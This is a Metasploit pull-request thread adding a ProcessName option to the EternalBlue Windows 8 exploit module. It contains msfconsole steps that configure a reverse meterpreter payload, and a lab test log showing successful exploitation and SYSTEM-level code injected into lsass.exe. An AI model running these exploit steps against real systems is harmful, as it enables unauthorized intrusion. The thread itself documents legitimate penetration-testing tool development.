
Add support for ms17_010_eternalblue_win8 ProcessName option #10794

Conversation

l9c
Contributor

@l9c l9c commented Oct 11, 2018

The shellcode was hardcoded to process "lsass.exe" or "spoolsv.exe". This change adds support for the ProcessName option by using a runtime hash (similar to #10792).
Please verify this module because I don't have a test machine for it.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/windows/smb/ms17_010_eternalblue_win8
  • set processname explorer.exe
  • set rhost <victim-address>
  • set payload windows/x64/meterpreter/reverse_tcp
  • set lhost <listener-address>
  • run
  • ps to find the PID of explorer.exe
  • getpid to check the PID

@bwatters-r7
Contributor

Testing on Windows 8.1x64 Pro:

msf5 exploit(windows/smb/ms17_010_eternalblue_win8) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue_win8):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   GroomAllocations  13               yes       Initial number of times to groom the kernel pool.
   ProcessName       spoolsv.exe      no        Process to inject payload into.
   RHOST             192.168.134.136  yes       Target server
   RPORT             445              yes       Target server port
   SMBPass           [redacted]       no        (Optional) The password for the specified username
   SMBUser           msfuser          no        (Optional) The username to authenticate as


Payload options (windows/x64/meterpreter/reverse_https):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.135.111  yes       The local listener hostname
   LPORT     45354            yes       The local listener port
   LURI                       no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   0   win x64


msf5 exploit(windows/smb/ms17_010_eternalblue_win8) > set processname lsass.exe
processname => lsass.exe
msf5 exploit(windows/smb/ms17_010_eternalblue_win8) > run

[*] Started HTTPS reverse handler on https://192.168.135.111:45354
[*] shellcode size: 1491
[*] numGroomConn: 13
[*] Target OS: Windows 8.1 Pro 9600
[*] got good NT Trans response
[*] got good NT Trans response
[*] SMB1 session setup allocate nonpaged pool success
[*] SMB1 session setup allocate nonpaged pool success
[*] good response status for nx: INVALID_PARAMETER
[*] good response status: INVALID_PARAMETER
[*] done
[*] https://192.168.135.111:45354 handling request from 192.168.134.136; (UUID: st6p1li8) Staging x64 payload (207449 bytes) ...

meterpreter > sysinfo
Computer        : WIN81X64
OS              : Windows 8.1 (Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getpid
Current pid: 528
meterpreter > ps

Process List
============

 PID   PPID  Name                    Arch  Session  User                          Path
 ---   ----  ----                    ----  -------  ----                          ----
 0     0     [System Process]                                                     
 4     0     System                  x64   0                                      
 272   4     smss.exe                x64   0                                      
 364   348   csrss.exe               x64   0                                      
 428   348   wininit.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\wininit.exe
 436   420   csrss.exe               x64   1                                      
 480   420   winlogon.exe            x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\winlogon.exe
 520   428   services.exe            x64   0                                      
 528   428   lsass.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsass.exe
 592   520   svchost.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\svchost.exe
 636   520   svchost.exe             x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\svchost.exe
 728   480   dwm.exe                 x64   1        Window Manager\DWM-1          C:\Windows\system32\dwm.exe
 748   520   vmacthlp.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmacthlp.exe
 760   520   spoolsv.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 800   520   svchost.exe             x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 832   520   svchost.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\svchost.exe
 876   520   svchost.exe             x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\system32\svchost.exe
 920   520   svchost.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 980   520   svchost.exe             x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\system32\svchost.exe
 1016  520   svchost.exe             x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\svchost.exe
 1140  800   audiodg.exe             x64   0                                      
 1180  2080  cmd.exe                 x64   1        WIN81X64\msfuser              C:\Windows\system32\cmd.exe
 1260  520   VGAuthService.exe       x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
 1320  520   vmtoolsd.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1356  520   MsMpEng.exe             x64   0                                      
 1376  520   svchost.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1580  520   svchost.exe             x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\svchost.exe
 1868  592   TiWorker.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_6.3.9600.16384_none_fa1dc1539b4180d8\TiWorker.exe
 1912  520   msdtc.exe               x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\msdtc.exe
 1968  832   taskhostex.exe          x64   1        WIN81X64\msfuser              C:\Windows\system32\taskhostex.exe
 2032  592   WmiPrvSE.exe            x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\wbem\wmiprvse.exe
 2080  2064  explorer.exe            x64   1        WIN81X64\msfuser              C:\Windows\Explorer.EXE
 2100  520   VSSVC.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\vssvc.exe
 2284  2448  SearchFilterHost.exe    x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\SearchFilterHost.exe
 2304  520   svchost.exe             x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\system32\svchost.exe
 2372  520   TrustedInstaller.exe    x64   0        NT AUTHORITY\SYSTEM           C:\Windows\servicing\TrustedInstaller.exe
 2448  520   SearchIndexer.exe       x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\SearchIndexer.exe
 2672  592   WmiPrvSE.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\wbem\wmiprvse.exe
 2808  2080  vmtoolsd.exe            x64   1        WIN81X64\msfuser              C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 2864  2836  jusched.exe             x86   1        WIN81X64\msfuser              C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
 2980  2448  SearchProtocolHost.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\SearchProtocolHost.exe
 3016  832   taskhost.exe            x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\system32\taskhost.exe
 3052  592   WSHost.exe              x64   1        WIN81X64\msfuser              C:\Windows\WinStore\WSHost.exe
 3364  520   dllhost.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\dllhost.exe
 3380  832   taskhost.exe            x64   1        WIN81X64\msfuser              C:\Windows\system32\taskhost.exe
 3564  1180  conhost.exe             x64   1        WIN81X64\msfuser              C:\Windows\system32\conhost.exe
 3656  520   msiexec.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\msiexec.exe
 3784  520   svchost.exe             x64   0                                      

meterpreter >

@bwatters-r7 bwatters-r7 merged commit ed2ba1c into rapid7:master Nov 5, 2018
@bwatters-r7
Contributor

Release notes

This PR allows users to specify into which process they would like the payload injected when using the ms17_010_eternalblue_win8 module.
